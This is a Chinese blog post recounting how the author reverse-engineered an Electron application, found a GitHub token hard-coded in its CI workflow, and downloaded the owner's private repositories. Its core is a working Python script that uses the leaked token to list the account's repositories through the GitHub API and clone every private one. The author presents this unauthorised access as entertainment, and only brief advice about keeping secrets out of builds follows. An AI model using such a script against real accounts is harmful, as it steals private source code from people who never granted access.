记一次逆向拿到github token 然后dump掉别人所有库的

最新推荐文章于 2024-08-29 10:01:59 发布
最新推荐文章于 2024-08-29 10:01:59 发布
阅读量319 收藏 1
点赞数
分类专栏: 笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22656473/article/details/119005543
版权

背景

今天逆electron程序,解包后看到了一个.github目录,打开后现这个人使用github ci,并且这个人很愚蠢的是把github的token写死到yml文件中了(切记这种是可以直接配置github的secrets参数的)
在这里插入图片描述

接着好玩的就来了,写一个脚本直接dump别人所有的代码库,下来品鉴品鉴

# pip install GitPython
import http.client
import json
import git
import os

GH_TOKEN = "xxxxxx"

conn = http.client.HTTPSConnection("api.github.com")
payload = ''
headers = {
    'Authorization': 'Basic xxxxxxxxxxx',
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36"
}
conn.request("GET", "/user/repos?per_page=100", payload, headers)
res = conn.getresponse()
data = res.read()
print(data.decode("utf-8"))
repos = json.loads(data.decode("utf-8"))
for repo in repos:
    print(f"Dumping | {repo['name']} | {repo['private']}")
    if repo['private'] != True:
        continue
    try:
        cloneDir = f"./repos/{repo['name']}"
        os.makedirs(cloneDir)
        git.Git(cloneDir).clone(f"https://{GH_TOKEN}:x-oauth-basic@github.com/{repo['full_name']}")
    except Exception as e:
        print(e)
        continue

在这里插入图片描述

在这里插入图片描述

最后简述

  • 在electron打包的时候,一定要注意不要打包一些token等密钥信息了
  • 任何构建平台都用secrets 不要直接写死了,大部分ci平台都支持
gtfeature
关注
专栏目录
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
GitHub:JS逆向和爬虫
追心
07-13 566
hello,小伙伴们大家好,今天给大家推荐的开源项目是:JSreverse,这个开源项目总结的是js逆向和爬虫,个人感觉适合新手入门JS反爬,感兴趣的小伙伴可以参考一下这个开源项目的逻辑,建议感兴趣的小伙伴可以下载一下这个开源项目,最好是自己上手练一下,然后捎带手输出一下你做项目的这个思路,流程等,共勉(手动狗头)。 以上就是这个开源项目的详细介绍了,感兴趣的小伙伴可以尝试应用一下。 开源地址:https://github.com/downdawn/JSreverse 今天的推荐不知道大家喜欢吗?如果你
25 万行逆向源码遭 GitHub 下架!
cainiao_python的博客
03-05 360
来源:CSDN(ID:CSDNnews)整理 | 郑丽媛近日,听闻有人将《GTA3》和《GTA:罪恶都市》这两款 R 星经典游戏成功逆向工程,并发布到 GitHub。目前,这 25 万行...
Electron程序逆向(asar归档解包)
夜空孤狼啸的博客
08-29 782
只有一个 exe 安装包,前提是这个安装包是electron写的。使用工具解压就可以了,先安装这个工具。
[开源工具] gitdump - 批量导出托管 Git 仓
无限进步
09-05 668
为了从 Github, Gitee, Coding 等 Git 托管网站批量备份我的代码到本地,我开发了一个 工具
GitHub Actions 使用
qq_32377725的博客
04-07 2214
没有 git push 权限。 参考: https://docs.github.com/en/actions/security-guides/automatic-token-authentication 原理:GitHub Actions帮我们默认建了一个 secrets 名称就是 GITHUB_TOKEN,想push得再设置点权限。 具体操作: 1、 得到写权限的TOKENGitHub 中设置, send write token 到我们的CI服务器。 2、赋予写权限 :修改 .yml文件中的p
逆向学习(二) 安卓逆向
qq_41392887的博客
06-12 4111
安卓逆向 0、准备工作和大纲 JAVA环境、apktool、android APK、JADX、keytool、jarsigner(最后两个为JAVASDK自带工具) java基本知识:源代码文件为XXX.java;是编译性语言,编译后才可以运行(PYTHON是解释性语言,直接可以运行);JAVA编译后的文件是XXX.class,class文件是可执行文件;JAVA虚拟机运行可以运行XXX.class方法为java XXX.class 安卓下面的xxx.dex dex是安卓里可执行文件 安卓软件包:A
【ibox app逆向之生成wtoken
MuErHuoXu的博客
06-09 2954
要实现对这款app数据的爬取,有个关键的环节,就是实现wtoken这个加密参数的生成,,而wtoken这个参数是由阿里云的WAF的防护模块控制的,具体实现放在so层,安全系数很高。逆向的思路有2个,一是通过反汇编so层,进而破解其生成逻辑,难度系数很大;二是黑盒调用so层逻辑,不管其加密逻辑如何复杂,黑盒调用即可;本文介绍的是第2种方案,采用AndServer RPC的方式实现,具体来说就是自己开发个app,只实现ibox中wtoken的生成逻辑,将该app安装在真机上,并且对外提供生成wtoken的htt
Android 逆向分析大全
墨鱼菜鸡
07-11 3491
转载:Android 逆向分析大全:https://www.jianshu.com/p/a12d04fc748f 1. 概述 1.1 分析步骤 通用逆向分析步骤 1. 了解该模块正向编程相关方法2. 使用apktool解密apk,得到资源、jni模块等文件3. 从apk提取出dex文件,使用dex2jar转换成jar文件,再用java逆向工具...
iOS逆向:【代码混淆】1、基于编译器混淆静态(StaticLib)2、字符串加密:使用clang-c接口将源代码转换成抽象语法树,并对抽象语法树进行遍历和分析,分析代码中的字符串,并进行加密处理。
热门推荐
iOS逆向与安全
01-02 1万+
iOS逆向:【代码混淆】1、基于编译器混淆静态(StaticLib)2、字符串加密:使用clang-c接口将源代码转换成抽象语法树,并对抽象语法树进行遍历和分析,分析代码中的字符串,并进行加密处理。
github 生成token的方法图解
10-14
主要介绍了github 生成token的方法,本文通过图文并茂的形式给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友参考下吧
Electron逆向调试
Steve_Abelieve
07-31 2083
调用窗口 添加命令行参数 启动允许调用,就可以实现调试发布环境的electron程序。断点调试分析程序的走向,程序基本上会有混淆代码处理, 需要调整代码格式,处理程序。
Electron编写的exe 参数逆向
weixin_42883988的博客
10-18 1371
到很多 ,但是编译后压缩了。但是可以通过进行格式化。
手把手教你用 Github Actions 部署前端项目
前端劝退师
04-19 2849
为什么使用 Github Actions ?众所周知,前端部署无非就是把打包之后的代码丢到 nginx html 目录下就完事了,但是每逢产品频繁改需求,甚至只是让你改线上一个字的时候,你...
【electron】【附排查清单】一次逆向过程中,fetch无法请求http的疑难杂症(net::ERR_BLOCKED_BY_CLIENT)
kinghzking的专栏
11-07 1815
electron很复杂,尤其是像本次遇到的问题,可以通过多种方式实现,所以我们需要一次次的尝试,排除错误答案,最终找到正确的解决方案。,将代码添加到目标进程的render中(如:app-bundle.js),这样我们就可以使用axios了,不过依然返回。虽然上面修正了fetch,但是依然担心fetch有问题,于是乎,尝试用第三方axios测试。从上面的各种尝试中,我们可以看出,通过浏览器js各种失败,那么通过nodejs呢。,为了解决该问题,又遇到无数其它问题,特此录,以敬后效。可是小编用的软件,在。
问题回复 - 逆向Electron程序打开控制台
半吊子伯爵的博客
05-14 951
4)搜索openDevTools,总共可以找到三处,上述是第三处,前面两处代码基本相同,是在两个自定义事件中切换控制台的打开状态。初步猜测网友所说的控制台会被关闭就是因为这两个事件函数,所以将两个函数中的代码注释;可以搜出来两处,但第二处仅是调用BrowserWindow下的方法,只有第一处是用来创建窗口的。3)在创建窗口的代码下方,可以发现有一段代码,当处于测试环境下的时候会默认打开控制台,最直接的思路就是将前半句的条件语句删除;修改后发现可以正常打开控制台,经测试,发现控制台并没有中途退出的情况。
探索GitHub秘密的利器:Github Secrets工具深度剖析与应用指南
gitblog_00036的博客
06-17 678
探索GitHub秘密的利器:Github Secrets工具深度剖析与应用指南 去发现同类优质开源项目:https://gitcode.com/ 在数字化时代,安全漏洞的发现与防范成为了开发者日常的重要一环。今天,我们要向大家介绍一个专为GitHub设计的安全检查工具——Github Secrets。这款开源工具凭借其独特功能,已成为众多开发者保护代码免受秘密泄露威胁的得力助手。 项目介绍 Gi...
curl github token
最新发布
09-08
`curl` 是一个常用的命令行工具,用于发送请求到服务器并获取数据。当需要与GitHub交互,比如执行API请求时,你可能会使用到GitHubtokenGitHubtoken是一个访问令牌,用于在API请求中提供身份验证,它可以让你安全地执行操作而不需要提供你的GitHub密码。 使用curl命令与GitHub API进行交互时,通常需要在HTTP请求的头部(Header)中加入这个token。以下是一个使用curl命令发送请求到GitHub API并附带token的示例: ```bash curl -H "Authorization: token YOUR_GITHUB_TOKEN" https://api.github.com/user ``` 在这个命令中,`YOUR_GITHUB_TOKEN` 需要替换为你从GitHub获取的个人访问令牌。请注意,出于安全考虑,你应该将此token保密,不要在公共场合分享或者公开你的代码中。 使用GitHub token的好处包括但不限于: - 增强安全性,避免在脚本或代码中直接使用用户名和密码。 - 灵活性,可以随时撤销或者刷新token。 - 更细粒度的权限控制,通过不同的权限配置来限制API操作的范围。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值